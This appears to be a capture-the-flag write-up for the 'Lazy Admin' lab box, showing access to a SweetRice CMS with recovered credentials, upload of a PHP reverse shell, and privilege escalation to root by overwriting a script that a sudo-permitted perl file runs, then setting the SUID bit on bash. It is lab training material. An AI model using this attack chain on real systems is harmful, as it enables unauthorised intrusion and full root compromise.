Skip to main content

Lazy Admin

SweetRice

  • SweetRice Login Portal: [IP:80/content/as]
  • We can use the previous found Credentials from SQL BackUP to Login: manager:Password123

LA


We can Upload the Reverse Shell using the ADS or MEDIA CENTER Panel.

  • [1]. Uploading using ADS our Reverse Shell will be Located at: [IP:80/content/inc/ads]
  • [1]. Uploading using MEDIA CENTER our Reverse Shell will be Located at: [IP:80/content/attachment]

  • Uploading the Reverse Shell Using MEDIA CENTER

LA


  • The Reverse Shell got Successfully Uploaded to: [IP:80/content/attachment]
   [ICO]             Name            Last modified   Size Description
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[PARENTDIR] Parent Directory                            -  
[ ]         php-reverse-shell.phtml 2022-10-07 10:03 5.4K  
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Privilege Escalation

  • We can catch the Reverse Shell Using netcat
www-data@THM-Chal /$  id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

  • The User www-data can run: [/usr/bin/perl /home/itguy/backup.pl] with ROOT Privileges.
  • The backup.pl executes a Script Located in: /etc/copy.sh. We have WRITE Permissions on the Script.
www-data@THM-Chal /$  sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
www-data@THM-Chal /$  ls -l /home/  
drwxr-xr-x 18 itguy itguy 4096 Nov 30  2019 itguy
www-data@THM-Chal /$  ls -l /home/itguy/
...
-rw-r--r-x 1 root  root    47 Nov 29  2019 backup.pl
...
www-data@THM-Chal /$  cat /home/itguy/backup.pl 
#!/usr/bin/perl
system("sh", "/etc/copy.sh");

  • We move into /tmp Directory and run the Following:
www-data@THM-Chal tmp$  echo "chmod +s /bin/bash" > SUID.sh
www-data@THM-Chal tmp$  echo "sh /tmp/SUID.sh" > /etc/copy.sh
www-data@THM-Chal tmp$  sudo /usr/bin/perl /home/itguy/backup.pl
www-data@THM-Chal tmp$  /bin/bash -p
www-data@THM-Chal tmp$  id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
www-data@THM-Chal tmp$  whoami
root